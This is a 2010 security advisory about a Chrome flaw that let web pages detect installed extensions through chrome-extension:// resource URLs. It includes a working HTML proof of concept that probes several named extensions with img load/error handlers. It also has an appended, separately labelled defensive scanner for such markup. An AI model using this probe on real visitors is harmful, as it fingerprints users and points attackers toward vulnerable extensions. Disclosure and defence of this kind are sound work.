######################################################
Google Chrome Installed extensions arbitrary detection
Vendor url: http://www.google.com
Advisory: http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html
Vendor notify: YES vendor confirmed: YES exploit: YES
######################################################
Change log: http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html
#########
Abstract
#########
How safe is it to use extensions?
An attacker can access extension resources via an iframe (at this moment I
have not found a way to alter information from extensions),
like
<iframe src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"></iframe>
for example...
A remote user can modify this web document and call it with the meta tag "base"
in a malformed document...
<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">
So I think that chrome-extension needs sanitization so that internal
resources cannot be accessed from external web pages (file:/// and other
protocol handlers are safe to use and don't give access to internal
resources from external web documents...).
So the chrome-extension protocol handler can be used to get the extensions
installed on the client browser... and then, if any extension is vulnerable to
something, this information can be used to exploit that extension...
In incognito mode, extensions are detectable too.
###########################
A sample PoC of detection
###########################
<html>
<head>
<title>Chrome extensions detector PoC By Lostmon</title>
</head>
<body>
<!-- Each image points at a resource inside one extension: onLoad fires if the extension is installed, onError if it is not -->
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have installed Gmail checker plus</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"
onLoad="document.write('<br /><b>you have installed Web Developer</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"
onLoad="document.write('<br /><b>you have installed My Shortcuts</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have installed Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"
onLoad="document.write('<br /><b>you have installed Webpage Screenshot</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"
onLoad="document.write('<br /><b>you have installed Speed dial</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"
onLoad="document.write('<br /><b>you have installed Downloads</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
</body>
</html>
####################EOF##########################
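Added example (not part of the original advisory): a defensive scanner that flags page markup pointing src/href at chrome-extension:// resources, as the iframe, BASE and img samples above do, and records whether load/error handlers are attached. The function names, the constructed sample markup and IDs, and the two-ID threshold are assumptions made for illustration.

```javascript
// Added example, not from the advisory. Names and threshold are assumptions.
// Chrome extension IDs are 32 characters drawn from the letters a-p.
const REF = /\b(src|href)\s*=\s*["']?\s*chrome-extension:\/\/([a-p]{32})(?![a-z0-9])(\/[^"'\s>]*)?/i;
const HANDLER = /\bon(load|error)\s*=/i; // load/error callbacks reveal the result

// Yield each tag, skipping '>' inside quoted attribute values
// (the advisory's handlers contain markup such as '<br />').
function* tags(html) {
  let i = 0;
  while ((i = html.indexOf("<", i)) !== -1) {
    let j = i + 1, quote = null;
    for (; j < html.length; j++) {
      const c = html[j];
      if (quote) { if (c === quote) quote = null; }
      else if (c === '"' || c === "'") quote = c;
      else if (c === ">") break;
    }
    yield html.slice(i, j + 1);
    i = j + 1;
  }
}

// One record per tag that points src/href at an extension resource.
function findExtensionRefs(html) {
  const refs = [];
  for (const tag of tags(html)) {
    const m = REF.exec(tag);
    if (!m) continue;
    const name = /^<([a-z0-9]+)/i.exec(tag);
    refs.push({ tag: name ? name[1].toLowerCase() : "?", attr: m[1].toLowerCase(),
                id: m[2].toLowerCase(), path: m[3] || "/", oracle: HANDLER.test(tag) });
  }
  return refs;
}

// minIds is an assumed threshold for calling a page an enumeration attempt.
function summarise(html, minIds = 2) {
  const refs = findExtensionRefs(html);
  const ids = [...new Set(refs.map((r) => r.id))];
  return { refs, ids, enumeration: ids.length >= minIds };
}

// Constructed sample markup with constructed extension IDs.
const ID_A = "abcdefghijklmnopabcdefghijklmnop";
const ID_B = "ponmlkjihgfedcbaponmlkjihgfedcba";
const SAMPLE = `<base href="chrome-extension://${ID_A}/">
<img src="chrome-extension://${ID_A}/icon_128.png" onLoad="note('<b>yes</b>')" onError="note('<b>no</b>')">
<iframe src="chrome-extension://${ID_B}/options.html"></iframe>
<img src="https://example.com/logo.png" onload="ok()">`;

console.log(summarise(SAMPLE));
```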
##############
Timeline
##############
Discovered: 27 May 2010
Vendor notify: 01 Jun 2010
Vendor patch: 02 Sep 2010
Disclosure: 07 Sep 2010
#######################END########################
Thanks to Climbo for his patience and support.
Sincerely:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....